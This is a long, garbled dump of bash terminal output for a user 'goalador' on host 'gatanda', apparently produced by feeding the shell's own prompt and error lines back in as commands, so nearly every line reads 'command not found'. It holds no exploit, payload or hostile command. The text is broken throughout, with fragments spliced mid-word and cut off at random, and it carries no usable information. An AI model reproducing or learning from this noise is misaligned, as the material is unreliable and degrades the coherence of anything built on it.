hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not fou[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ oundbash: bash:: command not found +bash: oundbash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: gatanda:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalbash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ and not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: and: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: commbash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goaladord +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ + command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ + command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: and: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: commbash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goaladord +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ command not found +bash: not: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ +f.de]$ [goalador[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: and: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +da hhneuauf.de]$ bash: [goalador@gatanda: cbash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: commbash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +f.bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +mmand not found +[goalador@gatanda hhneuauf.[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goaladord +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found 